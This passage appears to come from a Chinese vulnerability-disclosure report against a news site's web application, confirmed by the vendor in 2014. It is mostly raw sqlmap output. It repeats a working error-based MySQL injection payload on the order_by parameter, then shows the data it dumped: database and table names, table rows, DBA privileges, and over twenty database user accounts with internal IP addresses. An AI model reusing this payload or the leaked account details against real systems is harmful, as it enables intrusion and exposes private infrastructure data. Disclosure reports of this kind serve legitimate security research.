ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---current user is DBA: 'True'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---Database: apphistory_news[5 tables]+-------------+| figure || hot_tag || relate_news || relate_pic || stats |+-------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---Database: app_weather[5 tables]+-------------+| abroad || airport || internal || nephogram || relate_news |+-------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---Database: app_news[23 tables]+-----------------------------+| hash || hdphoto || ip_test || lianghui_2010 || lianghui_2010_copy_20100226 || lianghui_2010_lhyl || lianghui_2012 || lianghui_2012_lhyl || special_diqiuyixiaoshi2010 || special_martyr || special_qinghaiyushudizhen || special_xinanhanzai || timeline || tw_vote || upload || upload_20121116 || upload_v || user_test || vote_category || vote_detail || weather_yb || weather_yb_tomorrow || weather_zh |+-----------------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---Database: app_newsTable: user_test[2 entries]+----+--------------+------+---------+-------------+---------------------+| id | ip | lock | intro | username | rec_time |+----+--------------+------+---------+-------------+---------------------+| 1 | 220.181.24.2 | | <blank> | wangyun1127 | 2010-05-10 14:27:06 || 2 | 220.181.24.2 | | c100 | c100 | 0000-00-00 00:00:00 |+----+--------------+------+---------+-------------+---------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---Database: app_newsTable: hash[10 entries]+----+--------------+--------+| id | name | value |+----+--------------+--------+| 1 | ygdx_gd | 258 || 2 | ygdx_bsd | 306 || 3 | ygdx_zmd | 57 || 4 | ygdx_time | 5月8日 || 5 | wudu2010_hlb | 198864 || 6 | wudu2010_szc | 150782 || 7 | wudu2010_wyc | 0 || 8 | wudu2010_xsh | 0 || 9 | wudu2010_wwm | 0 || 10 | wudu2010_zll | 358715 |+----+--------------+--------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---Database: app_newsTable: lianghui_2012[10 entries]+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+| id | type | title | verify | delete | cai_num | content | ding_num | user_name | user_type | click_num | debate_num | submit_time |+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+| 1 | 1 | 1 | 1 | | 2 | 1 | 3 | kuaibo_10501 | 1 | 7 | 0 | 2012-02-28 17:44:30 || 2 | 1 | 11 | 1 | | 0 | 1 | 1 | kuaibo_10501 | 1 | 0 | 0 | 2012-02-29 15:46:47 || 3 | 1 | 2 | 1 | | 0 | 2 | 1 | kuaibo_10501 | 1 | 0 | 0 | 2012-02-29 15:46:54 || 4 | 1 | 3 | 1 | | 0 | 3 | 0 | kuaibo_10501 | 1 | 0 | 0 | 2012-02-29 15:46:59 || 5 | 1 | 4 | 1 | | 0 | 4 | 0 | kuaibo_10501 | 1 | 0 | 0 | 2012-02-29 15:47:05 || 6 | 1 | 5 | 1 | | 1 | 5 | 0 | kuaibo_10501 | 1 | 0 | 0 | 2012-02-29 15:47:09 || 7 | 1 | 5 | 1 | | 1 | 5 | 20 | kuaibo_10501 | 1 | 97 | 0 | 2012-02-29 15:47:17 || 8 | 1 | 6 | 1 | | 0 | 6 | 5 | kuaibo_10501 | 1 | 107 | 0 | 2012-02-29 15:47:22 || 9 | 1 | 7 | 1 | | 0 | 7 | 91 | kuaibo_10501 | 1 | 235 | 0 | 2012-02-29 15:47:26 || 10 | 1 | 8 | 1 | | 2 | 8 | 2 | kuaibo_10501 | 1 | 97 | 0 | 2012-02-29 15:47:31 |+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---available databases [11]:[*] app_bbs[*] app_news[*] app_weather[*] apphistory_news[*] appmil_news[*] appsports_news[*] baike_health[*] baike_house[*] information_schema[*] mysql[*] testsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---current user is DBA: 'True'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---database management system users [234]:[*] ''@'localhost'[*] 'B74wNuTbbx'@'10.11.2.89'[*] 'B74wNuTbbx'@'10.11.2.90'[*] 'B74wNuTbbx'@'10.13.2.134'[*] 'B74wNuTbbx'@'10.13.2.135'[*] 'B74wNuTbbx'@'10.13.2.176'[*] 'B74wNuTbbx'@'10.13.2.177'[*] 'B74wNuTbbx'@'220.181.67.192'[*] 'iadmin'@'211.151.61.77'[*] 'root'@'10.13.2.132'[*] 'root'@'10.13.2.134'[*] 'root'@'10.13.2.135'[*] 'root'@'10.13.2.176'[*] 'root'@'10.13.2.177'[*] 'root'@'127.0.0.1'[*] 'root'@'192.168.2.162'[*] 'root'@'192.168.2.167'[*] 'root'@'220.181.24.100'[*] 'root'@'220.181.24.166'[*] 'root'@'220.181.24.2'[*] 'root'@'220.181.67.192'[*] 'root'@'localhost'[*] 'zabbix'@'127.0.0.1'
防注入
危害等级:高
漏洞Rank:12
确认时间:2014-05-05 13:59
非常感谢您对凤凰网信息安全的关注,我们会尽快修复这个漏洞.
暂无
给力!
兄台打个码吧。。。人家不好弄啊